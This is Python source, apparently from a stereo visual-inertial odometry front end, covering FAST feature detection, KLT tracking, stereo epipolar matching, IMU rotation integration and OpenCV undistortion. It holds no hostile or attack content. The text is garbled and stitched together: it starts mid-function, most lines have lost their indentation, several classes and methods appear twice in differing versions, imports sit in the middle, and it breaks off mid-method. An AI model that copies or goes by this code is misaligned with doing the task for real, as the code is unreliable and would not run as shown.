for i in range(len(cam0_points_undistorted)):
if not inlier_markers[i]:
continue
pt0 = np.array([*cam0_points_undistorted[i], 1.0])
pt1 = np.array([*cam1_points_undistorted[i], 1.0])
epipolar_line = E @ pt0
            error = np.abs((pt1 * epipolar_line).sum()) / np.linalg.norm(
                epipolar_line[:2])
if error > self.config.stereo_threshold * norm_pixel_unit:
inlier_markers[i] = 0
return cam1_points, inlier_markers
def undistort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs, rectification_matrix=np.identity(3),
new_intrinsics=np.array([1, 1, 0, 0])):
"""
Arguments:
pts_in: points to be undistorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
            rectification_matrix: rotation applied to the normalized points
                before reprojection (defaults to identity).
            new_intrinsics: intrinsics of the output frame; the default
                [1, 1, 0, 0] yields normalized coordinates.
Returns:
pts_out: undistorted points.
"""
if len(pts_in) == 0:
return []
pts_in = np.reshape(pts_in, (-1, 1, 2))
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
K_new = np.array([[new_intrinsics[0], 0.0, new_intrinsics[2]], [0.0,
new_intrinsics[1], new_intrinsics[3]], [0.0, 0.0, 1.0]])
if distortion_model == 'equidistant':
pts_out = cv2.fisheye.undistortPoints(pts_in, K,
distortion_coeffs, rectification_matrix, K_new)
else:
pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs,
None, rectification_matrix, K_new)
return pts_out.reshape((-1, 2))
def distort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs):
"""
Arguments:
pts_in: points to be distorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
Returns:
pts_out: distorted points. (N, 2)
"""
if len(pts_in) == 0:
return []
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
if distortion_model == 'equidistant':
pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)
else:
homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)
pts_out, _ = cv2.projectPoints(homogenous_pts, np.zeros(3), np.
zeros(3), K, distortion_coeffs)
return pts_out.reshape((-1, 2))
def draw_features_stereo(self):
img0 = self.cam0_curr_img_msg.image
img1 = self.cam1_curr_img_msg.image
kps0 = []
kps1 = []
matches = []
for feature in chain.from_iterable(self.curr_features):
matches.append(cv2.DMatch(len(kps0), len(kps0), 0))
kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))
kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))
img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)
cv2.imshow('stereo features', img)
cv2.waitKey(1)
class FeatureMetaData(object):
    """
    Contain necessary information of a feature for easy access.
    """

    def __init__(self):
        # Attribute set inferred from how FeatureMetaData is used below.
        self.id = None
        self.response = None
        self.lifetime = None
        self.cam0_point = None
        self.cam1_point = None
class FeatureMeasurement(object):
"""
Stereo measurement of a feature.
"""
def __init__(self):
self.id = None
self.u0 = None
self.v0 = None
self.u1 = None
self.v1 = None
class ImageProcessor(object):
"""
Detect and track features in image sequences.
"""
def __init__(self, config):
self.config = config
self.is_first_img = True
self.next_feature_id = 0
self.detector = cv2.FastFeatureDetector_create(self.config.
fast_threshold)
self.imu_msg_buffer = []
self.cam0_prev_img_msg = None
self.cam0_curr_img_msg = None
self.cam1_curr_img_msg = None
self.prev_cam0_pyramid = None
self.curr_cam0_pyramid = None
self.curr_cam1_pyramid = None
self.prev_features = [[] for _ in range(self.config.grid_num)]
self.curr_features = [[] for _ in range(self.config.grid_num)]
self.num_features = defaultdict(int)
self.cam0_resolution = config.cam0_resolution
self.cam0_intrinsics = config.cam0_intrinsics
self.cam0_distortion_model = config.cam0_distortion_model
self.cam0_distortion_coeffs = config.cam0_distortion_coeffs
self.cam1_resolution = config.cam1_resolution
self.cam1_intrinsics = config.cam1_intrinsics
self.cam1_distortion_model = config.cam1_distortion_model
self.cam1_distortion_coeffs = config.cam1_distortion_coeffs
self.T_cam0_imu = np.linalg.inv(config.T_imu_cam0)
self.R_cam0_imu = self.T_cam0_imu[:3, :3]
self.t_cam0_imu = self.T_cam0_imu[:3, 3]
self.T_cam1_imu = np.linalg.inv(config.T_imu_cam1)
self.R_cam1_imu = self.T_cam1_imu[:3, :3]
self.t_cam1_imu = self.T_cam1_imu[:3, 3]
self.image_id = 0
def stereo_callback(self, stereo_msg):
"""
Callback function for the stereo images.
"""
start = time.time()
self.cam0_curr_img_msg = stereo_msg.cam0_msg
self.cam1_curr_img_msg = stereo_msg.cam1_msg
self.create_image_pyramids()
if self.is_first_img:
if not self.config.load_features_flag:
self.initialize_first_frame()
self.is_first_img = False
elif not self.config.load_features_flag:
t = time.time()
self.track_features()
print('___track_features:', time.time() - t)
t = time.time()
self.add_new_features()
print('___add_new_features:', time.time() - t)
t = time.time()
self.prune_features()
print('___prune_features:', time.time() - t)
            t = time.time()
            # self.draw_features_stereo()  # optional visualization, disabled
            print('___draw_features_stereo:', time.time() - t)
print('===image process elapsed:', time.time() - start,
f'({stereo_msg.timestamp})')
if not self.config.load_features_flag:
try:
self.save_features()
return self.publish()
finally:
self.cam0_prev_img_msg = self.cam0_curr_img_msg
self.prev_features = self.curr_features
self.prev_cam0_pyramid = self.curr_cam0_pyramid
self.curr_features = [[] for _ in range(self.config.grid_num)]
else:
self.load_features()
return self.publish()
def imu_callback(self, msg):
"""
Callback function for the imu message.
"""
self.imu_msg_buffer.append(msg)
def create_image_pyramids(self):
"""
Create image pyramids used for KLT tracking.
        (Pyramid construction seems not to work from Python, so the raw
        image is used directly.)
"""
curr_cam0_img = self.cam0_curr_img_msg.image
self.curr_cam0_pyramid = curr_cam0_img
curr_cam1_img = self.cam1_curr_img_msg.image
self.curr_cam1_pyramid = curr_cam1_img
def initialize_first_frame(self):
"""
        Initialize the image processing sequence, which basically detects
        new features on the first set of stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
new_features = self.detector.detect(img)
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers = [], []
response_inliers = []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row * self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x: x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
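    # Sketch of the per-grid selection just above with assumed numbers: if
    # one cell collected 7 stereo-matched candidates and
    # grid_min_feature_num = 3, only the 3 strongest FAST responses survive:
    #
    #   kept = sorted(cell, key=lambda f: f.response, reverse=True)[:3]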
def track_features(self):
"""
        Track features on the newly received stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
cam0_R_p_c, cam1_R_p_c = self.integrate_imu_data()
prev_ids = []
prev_lifetime = []
prev_cam0_points = []
prev_cam1_points = []
for feature in chain.from_iterable(self.prev_features):
prev_ids.append(feature.id)
prev_lifetime.append(feature.lifetime)
prev_cam0_points.append(feature.cam0_point)
prev_cam1_points.append(feature.cam1_point)
prev_cam0_points = np.array(prev_cam0_points, dtype=np.float32)
self.num_features['before_tracking'] = len(prev_cam0_points)
if len(prev_cam0_points) == 0:
return
curr_cam0_points = self.predict_feature_tracking(prev_cam0_points,
cam0_R_p_c, self.cam0_intrinsics)
curr_cam0_points, track_inliers, _ = cv2.calcOpticalFlowPyrLK(self.
prev_cam0_pyramid, self.curr_cam0_pyramid, prev_cam0_points.
astype(np.float32), curr_cam0_points.astype(np.float32), **self
.config.lk_params)
for i, point in enumerate(curr_cam0_points):
if not track_inliers[i]:
continue
if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1
] < 0 or point[1] > img.shape[0] - 1:
track_inliers[i] = 0
prev_tracked_ids = select(prev_ids, track_inliers)
prev_tracked_lifetime = select(prev_lifetime, track_inliers)
prev_tracked_cam0_points = select(prev_cam0_points, track_inliers)
prev_tracked_cam1_points = select(prev_cam1_points, track_inliers)
curr_tracked_cam0_points = select(curr_cam0_points, track_inliers)
self.num_features['after_tracking'] = len(curr_tracked_cam0_points)
curr_cam1_points, match_inliers = self.stereo_match(
curr_tracked_cam0_points)
prev_matched_ids = select(prev_tracked_ids, match_inliers)
prev_matched_lifetime = select(prev_tracked_lifetime, match_inliers)
prev_matched_cam0_points = select(prev_tracked_cam0_points,
match_inliers)
prev_matched_cam1_points = select(prev_tracked_cam1_points,
match_inliers)
curr_matched_cam0_points = select(curr_tracked_cam0_points,
match_inliers)
curr_matched_cam1_points = select(curr_cam1_points, match_inliers)
self.num_features['after_matching'] = len(curr_matched_cam0_points)
cam0_ransac_inliers = [1] * len(prev_matched_cam0_points)
cam1_ransac_inliers = [1] * len(prev_matched_cam1_points)
after_ransac = 0
for i in range(len(cam0_ransac_inliers)):
if not (cam0_ransac_inliers[i] and cam1_ransac_inliers[i]):
continue
row = int(curr_matched_cam0_points[i][1] / grid_height)
col = int(curr_matched_cam0_points[i][0] / grid_width)
code = row * self.config.grid_col + col
grid_new_feature = FeatureMetaData()
grid_new_feature.id = prev_matched_ids[i]
grid_new_feature.lifetime = prev_matched_lifetime[i] + 1
grid_new_feature.cam0_point = curr_matched_cam0_points[i]
grid_new_feature.cam1_point = curr_matched_cam1_points[i]
prev_matched_lifetime[i] += 1
self.curr_features[code].append(grid_new_feature)
after_ransac += 1
self.num_features['after_ransac'] = after_ransac
def add_new_features(self):
"""
Detect new features on the image to ensure that the features are
uniformly distributed on the image.
"""
curr_img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(curr_img)
mask = np.ones(curr_img.shape[:2], dtype='uint8')
for feature in chain.from_iterable(self.curr_features):
x, y = map(int, feature.cam0_point)
mask[y - 3:y + 4, x - 3:x + 4] = 0
new_features = self.detector.detect(curr_img, mask=mask)
new_feature_sieve = [[] for _ in range(self.config.grid_num)]
for feature in new_features:
row = int(feature.pt[1] / grid_height)
col = int(feature.pt[0] / grid_width)
code = row * self.config.grid_col + col
new_feature_sieve[code].append(feature)
new_features = []
for features in new_feature_sieve:
if len(features) > self.config.grid_max_feature_num:
features = sorted(features, key=lambda x: x.response,
reverse=True)[:self.config.grid_max_feature_num]
new_features.append(features)
new_features = list(chain.from_iterable(new_features))
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers, response_inliers = [], [], []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row * self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x: x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
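    # The mask above zeroes a 7x7 patch (rows y-3..y+3, cols x-3..x+3)
    # around every existing feature so FAST cannot re-detect it. Smaller
    # sketch with a single feature at (10, 10):
    #
    #   m = np.ones((20, 20), dtype='uint8')
    #   m[10 - 3:10 + 4, 10 - 3:10 + 4] = 0   # 7x7 suppression window
    #   # self.detector.detect(img, mask=m) ignores points where m == 0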
def prune_features(self):
"""
Remove some of the features of a grid in case there are too many
features inside of that grid, which ensures the number of features
within each grid is bounded.
"""
for i, features in enumerate(self.curr_features):
if len(features) <= self.config.grid_max_feature_num:
continue
self.curr_features[i] = sorted(features, key=lambda x: x.
lifetime, reverse=True)[:self.config.grid_max_feature_num]
def load_features(self):
filename = self.config.result_dir + str(self.image_id) + '.npz'
self.curr_features = np.load(filename, allow_pickle=True)['arr_0']
self.image_id += 1
def save_features(self):
filename = self.config.result_dir + str(self.image_id) + '.npz'
np.savez(filename, self.curr_features)
self.image_id += 1
def publish(self):
"""
Publish the features on the current image including both the
tracked and newly detected ones.
"""
curr_ids = []
curr_cam0_points = []
curr_cam1_points = []
for feature in chain.from_iterable(self.curr_features):
curr_ids.append(feature.id)
curr_cam0_points.append(feature.cam0_point)
curr_cam1_points.append(feature.cam1_point)
curr_cam0_points_undistorted = self.undistort_points(curr_cam0_points,
self.cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs)
curr_cam1_points_undistorted = self.undistort_points(curr_cam1_points,
self.cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
features = []
for i in range(len(curr_ids)):
fm = FeatureMeasurement()
fm.id = curr_ids[i]
fm.u0 = curr_cam0_points_undistorted[i][0]
fm.v0 = curr_cam0_points_undistorted[i][1]
fm.u1 = curr_cam1_points_undistorted[i][0]
fm.v1 = curr_cam1_points_undistorted[i][1]
features.append(fm)
feature_msg = namedtuple('feature_msg', ['timestamp', 'features'])(self
.cam0_curr_img_msg.timestamp, features)
return feature_msg
def integrate_imu_data(self):
"""
Integrates the IMU gyro readings between the two consecutive images,
which is used for both tracking prediction and 2-point RANSAC.
Returns:
cam0_R_p_c: a rotation matrix which takes a vector from previous
cam0 frame to current cam0 frame.
cam1_R_p_c: a rotation matrix which takes a vector from previous
cam1 frame to current cam1 frame.
"""
idx_begin = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:
idx_begin = i
break
idx_end = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:
idx_end = i
break
if idx_begin is None or idx_end is None:
return np.identity(3), np.identity(3)
mean_ang_vel = np.zeros(3)
for i in range(idx_begin, idx_end):
mean_ang_vel += self.imu_msg_buffer[i].angular_velocity
if idx_end > idx_begin:
mean_ang_vel /= idx_end - idx_begin
cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel
cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel
dt = (self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.
timestamp)
cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T
cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T
self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]
return cam0_R_p_c, cam1_R_p_c
def rescale_points(self, pts1, pts2):
"""
Arguments:
pts1: first set of points.
pts2: second set of points.
Returns:
pts1: scaled first set of points.
pts2: scaled second set of points.
scaling_factor: scaling factor
"""
scaling_factor = 0
for pt1, pt2 in zip(pts1, pts2):
scaling_factor += np.linalg.norm(pt1)
scaling_factor += np.linalg.norm(pt2)
scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)
for i in range(len(pts1)):
pts1[i] *= scaling_factor
pts2[i] *= scaling_factor
return pts1, pts2, scaling_factor
def get_grid_size(self, img):
"""
        Size of each grid cell (height, width), in pixels.
"""
grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))
grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))
return grid_height, grid_width
def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):
"""
        Compensates the rotation between consecutive camera frames so that
        feature tracking is more robust and fast.
Arguments:
input_pts: features in the previous image to be tracked.
R_p_c: a rotation matrix takes a vector in the previous camera
frame to the current camera frame. (matrix33)
intrinsics: intrinsic matrix of the camera. (vec3)
Returns:
compensated_pts: predicted locations of the features in the
current image based on the provided rotation.
"""
if len(input_pts) == 0:
return []
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
H = K @ R_p_c @ np.linalg.inv(K)
compensated_pts = []
for i in range(len(input_pts)):
p1 = np.array([*input_pts[i], 1.0])
p2 = H @ p1
compensated_pts.append(p2[:2] / p2[2])
return np.array(compensated_pts, dtype=np.float32)
def stereo_match(self, cam0_points):
"""
Matches features with stereo image pairs.
Arguments:
cam0_points: points in the primary image.
Returns:
cam1_points: points in the secondary image.
inlier_markers: 1 if the match is valid, 0 otherwise.
"""
cam0_points = np.array(cam0_points)
if len(cam0_points) == 0:
            return np.array([]), np.array([])
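        # Project cam0 points into cam1 using the rotation from the stereo
        # extrinsics to obtain initial guesses for the LK tracker.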
R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu
        cam0_points_undistorted = self.undistort_points(
            cam0_points, self.cam0_intrinsics,
            self.cam0_distortion_model, self.cam0_distortion_coeffs,
            R_cam0_cam1)
        cam1_points = self.distort_points(
            cam0_points_undistorted, self.cam1_intrinsics,
            self.cam1_distortion_model, self.cam1_distortion_coeffs)
cam1_points_copy = cam1_points.copy()
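        # Track features using LK optical flow method.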
cam0_points = cam0_points.astype(np.float32)
cam1_points = cam1_points.astype(np.float32)
        cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(
            self.curr_cam0_pyramid, self.curr_cam1_pyramid,
            cam0_points, cam1_points, **self.config.lk_params)
        cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(
            self.curr_cam1_pyramid, self.curr_cam0_pyramid,
            cam1_points, cam0_points.copy(), **self.config.lk_params)
err = np.linalg.norm(cam0_points - cam0_points_, axis=1)
disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])
inlier_markers = np.logical_and.reduce([inlier_markers.reshape(-1),
err < 3, disparity < 20])
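        # Mark those tracked points out of the image region as untracked.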
img = self.cam1_curr_img_msg.image
for i, point in enumerate(cam1_points):
if not inlier_markers[i]:
continue
            if (point[0] < 0 or point[0] > img.shape[1] - 1 or
                    point[1] < 0 or point[1] > img.shape[0] - 1):
                inlier_markers[i] = 0
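        # Compute the relative translation between the cam0 and cam1 frames.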
t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)
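        # Compute the essential matrix.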
E = skew(t_cam0_cam1) @ R_cam0_cam1
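        # Further remove outliers based on the known essential matrix.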
        cam0_points_undistorted = self.undistort_points(
            cam0_points, self.cam0_intrinsics,
            self.cam0_distortion_model, self.cam0_distortion_coeffs)
        cam1_points_undistorted = self.undistort_points(
            cam1_points, self.cam1_intrinsics,
            self.cam1_distortion_model, self.cam1_distortion_coeffs)
        norm_pixel_unit = 4.0 / (
            self.cam0_intrinsics[0] + self.cam0_intrinsics[1] +
            self.cam1_intrinsics[0] + self.cam1_intrinsics[1])
for i in range(len(cam0_points_undistorted)):
if not inlier_markers[i]:
continue
pt0 = np.array([*cam0_points_undistorted[i], 1.0])
pt1 = np.array([*cam1_points_undistorted[i], 1.0])
epipolar_line = E @ pt0
            # Point-to-epipolar-line distance: |pt1 . l| / ||(l0, l1)||.
            error = np.abs(pt1 @ epipolar_line) / np.linalg.norm(
                epipolar_line[:2])
if error > self.config.stereo_threshold * norm_pixel_unit:
inlier_markers[i] = 0
return cam1_points, inlier_markers
def undistort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs, rectification_matrix=np.identity(3),
new_intrinsics=np.array([1, 1, 0, 0])):
"""
Arguments:
pts_in: points to be undistorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
rectification_matrix:
new_intrinsics:
Returns:
pts_out: undistorted points.
"""
if len(pts_in) == 0:
return []
pts_in = np.reshape(pts_in, (-1, 1, 2))
        K = np.array([
            [intrinsics[0], 0.0, intrinsics[2]],
            [0.0, intrinsics[1], intrinsics[3]],
            [0.0, 0.0, 1.0]])
        K_new = np.array([
            [new_intrinsics[0], 0.0, new_intrinsics[2]],
            [0.0, new_intrinsics[1], new_intrinsics[3]],
            [0.0, 0.0, 1.0]])
        if distortion_model == 'equidistant':
            pts_out = cv2.fisheye.undistortPoints(pts_in, K,
                distortion_coeffs, rectification_matrix, K_new)
        else:   # default: 'radtan'
            pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs,
                None, rectification_matrix, K_new)
return pts_out.reshape((-1, 2))
def distort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs):
"""
Arguments:
pts_in: points to be distorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
Returns:
pts_out: distorted points. (N, 2)
"""
if len(pts_in) == 0:
return []
        K = np.array([
            [intrinsics[0], 0.0, intrinsics[2]],
            [0.0, intrinsics[1], intrinsics[3]],
            [0.0, 0.0, 1.0]])
        if distortion_model == 'equidistant':
            pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)
        else:   # default: 'radtan'
            homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)
            pts_out, _ = cv2.projectPoints(homogenous_pts, np.zeros(3),
                np.zeros(3), K, distortion_coeffs)
return pts_out.reshape((-1, 2))
def draw_features_stereo(self):
img0 = self.cam0_curr_img_msg.image
img1 = self.cam1_curr_img_msg.image
kps0 = []
kps1 = []
matches = []
for feature in chain.from_iterable(self.curr_features):
matches.append(cv2.DMatch(len(kps0), len(kps0), 0))
kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))
kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))
img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)
cv2.imshow('stereo features', img)
cv2.waitKey(1)
import numpy as np
import cv2
import time
from itertools import chain, compress
from collections import defaultdict, namedtuple
class FeatureMetaData(object):
"""
    Contains the necessary information of a feature for easy access.
"""
def __init__(self):
self.id = None # int
self.response = None # float
self.lifetime = None # int
self.cam0_point = None # vec2
self.cam1_point = None # vec2
class FeatureMeasurement(object):
"""
Stereo measurement of a feature.
"""
def __init__(self):
self.id = None
self.u0 = None
self.v0 = None
self.u1 = None
self.v1 = None
class ImageProcessor(object):
"""
Detect and track features in image sequences.
"""
def __init__(self, config):
self.config = config
# Indicate if this is the first image message.
self.is_first_img = True
# ID for the next new feature.
self.next_feature_id = 0
# Feature detector
self.detector = cv2.FastFeatureDetector_create(self.config.fast_threshold)
# IMU message buffer.
self.imu_msg_buffer = []
# Previous and current images
self.cam0_prev_img_msg = None
self.cam0_curr_img_msg = None
self.cam1_curr_img_msg = None
# Pyramids for previous and current image
self.prev_cam0_pyramid = None
self.curr_cam0_pyramid = None
self.curr_cam1_pyramid = None
# Features in the previous and current image.
# list of lists of FeatureMetaData
self.prev_features = [[] for _ in range(self.config.grid_num)] # Don't use [[]] * N
self.curr_features = [[] for _ in range(self.config.grid_num)]
# Number of features after each outlier removal step.
# keys: before_tracking, after_tracking, after_matching, after_ransac
self.num_features = defaultdict(int)
# load config
# Camera calibration parameters
self.cam0_resolution = config.cam0_resolution # vec2
self.cam0_intrinsics = config.cam0_intrinsics # vec4
self.cam0_distortion_model = config.cam0_distortion_model # string
self.cam0_distortion_coeffs = config.cam0_distortion_coeffs # vec4
self.cam1_resolution = config.cam1_resolution # vec2
self.cam1_intrinsics = config.cam1_intrinsics # vec4
self.cam1_distortion_model = config.cam1_distortion_model # string
self.cam1_distortion_coeffs = config.cam1_distortion_coeffs # vec4
# Take a vector from cam0 frame to the IMU frame.
self.T_cam0_imu = np.linalg.inv(config.T_imu_cam0)
self.R_cam0_imu = self.T_cam0_imu[:3, :3]
self.t_cam0_imu = self.T_cam0_imu[:3, 3]
# Take a vector from cam1 frame to the IMU frame.
self.T_cam1_imu = np.linalg.inv(config.T_imu_cam1)
self.R_cam1_imu = self.T_cam1_imu[:3, :3]
self.t_cam1_imu = self.T_cam1_imu[:3, 3]
self.image_id = 0
def stereo_callback(self, stereo_msg):
"""
Callback function for the stereo images.
"""
start = time.time()
self.cam0_curr_img_msg = stereo_msg.cam0_msg
self.cam1_curr_img_msg = stereo_msg.cam1_msg
# Build the image pyramids once since they're used at multiple places.
self.create_image_pyramids()
# Detect features in the first frame.
if self.is_first_img:
if not self.config.load_features_flag:
self.initialize_first_frame()
self.is_first_img = False
# Draw results.
# self.draw_features_stereo()
else:
if not self.config.load_features_flag:
# Track the feature in the previous image.
t = time.time()
self.track_features()
print('___track_features:', time.time() - t)
t = time.time()
# Add new features into the current image.
self.add_new_features()
print('___add_new_features:', time.time() - t)
t = time.time()
self.prune_features()
print('___prune_features:', time.time() - t)
t = time.time()
# Draw results.
# self.draw_features_stereo()
print('___draw_features_stereo:', time.time() - t)
t = time.time()
print('===image process elapsed:', time.time() - start, f'({stereo_msg.timestamp})')
if not self.config.load_features_flag:
try:
self.save_features()
return self.publish()
finally:
self.cam0_prev_img_msg = self.cam0_curr_img_msg
self.prev_features = self.curr_features
self.prev_cam0_pyramid = self.curr_cam0_pyramid
# Initialize the current features to empty vectors.
self.curr_features = [[] for _ in range(self.config.grid_num)]
else:
self.load_features()
return self.publish()
def imu_callback(self, msg):
"""
Callback function for the imu message.
"""
self.imu_msg_buffer.append(msg)
def create_image_pyramids(self):
"""
Create image pyramids used for KLT tracking.
        (cv2.buildOpticalFlowPyramid doesn't seem to work from Python,
        so the raw images are used in place of real pyramids.)
"""
curr_cam0_img = self.cam0_curr_img_msg.image
# self.curr_cam0_pyramid = cv2.buildOpticalFlowPyramid(
# curr_cam0_img, self.config.win_size, self.config.pyramid_levels,
# None, cv2.BORDER_REFLECT_101, cv2.BORDER_CONSTANT, False)[1]
self.curr_cam0_pyramid = curr_cam0_img
curr_cam1_img = self.cam1_curr_img_msg.image
# self.curr_cam1_pyramid = cv2.buildOpticalFlowPyramid(
# curr_cam1_img, self.config.win_size, self.config.pyramid_levels,
# None, cv2.BORDER_REFLECT_101, cv2.BORDER_CONSTANT, False)[1]
self.curr_cam1_pyramid = curr_cam1_img
def initialize_first_frame(self):
"""
        Initialize the image processing sequence, which basically detects
        new features on the first set of stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
        # Detect new features on the first image.
new_features = self.detector.detect(img)
# Find the stereo matched points for the newly detected features.
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers = [], []
response_inliers = []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
# len(cam0_inliers) < max(5, 0.1 * len(new_features))
# Group the features into grids
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row*self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
        # Sort the new features in each grid by response, and collect the
        # highest-response features from each grid.
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x:x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
def track_features(self):
"""
        Track features on the newly received stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
# Compute a rough relative rotation which takes a vector
# from the previous frame to the current frame.
cam0_R_p_c, cam1_R_p_c = self.integrate_imu_data()
# Organize the features in the previous image.
prev_ids = []
prev_lifetime = []
prev_cam0_points = []
prev_cam1_points = []
for feature in chain.from_iterable(self.prev_features):
prev_ids.append(feature.id)
prev_lifetime.append(feature.lifetime)
prev_cam0_points.append(feature.cam0_point)
prev_cam1_points.append(feature.cam1_point)
prev_cam0_points = np.array(prev_cam0_points, dtype=np.float32)
# Number of the features before tracking.
self.num_features['before_tracking'] = len(prev_cam0_points)
# Abort tracking if there is no features in the previous frame.
if len(prev_cam0_points) == 0:
return
# Track features using LK optical flow method.
curr_cam0_points = self.predict_feature_tracking(
prev_cam0_points, cam0_R_p_c, self.cam0_intrinsics)
curr_cam0_points, track_inliers, _ = cv2.calcOpticalFlowPyrLK(
self.prev_cam0_pyramid, self.curr_cam0_pyramid,
prev_cam0_points.astype(np.float32),
curr_cam0_points.astype(np.float32),
**self.config.lk_params)
# Mark those tracked points out of the image region as untracked.
for i, point in enumerate(curr_cam0_points):
if not track_inliers[i]:
continue
if (point[0] < 0 or point[0] > img.shape[1]-1 or
point[1] < 0 or point[1] > img.shape[0]-1):
track_inliers[i] = 0
# Collect the tracked points.
prev_tracked_ids = select(prev_ids, track_inliers)
prev_tracked_lifetime = select(prev_lifetime, track_inliers)
prev_tracked_cam0_points = select(prev_cam0_points, track_inliers)
prev_tracked_cam1_points = select(prev_cam1_points, track_inliers)
curr_tracked_cam0_points = select(curr_cam0_points, track_inliers)
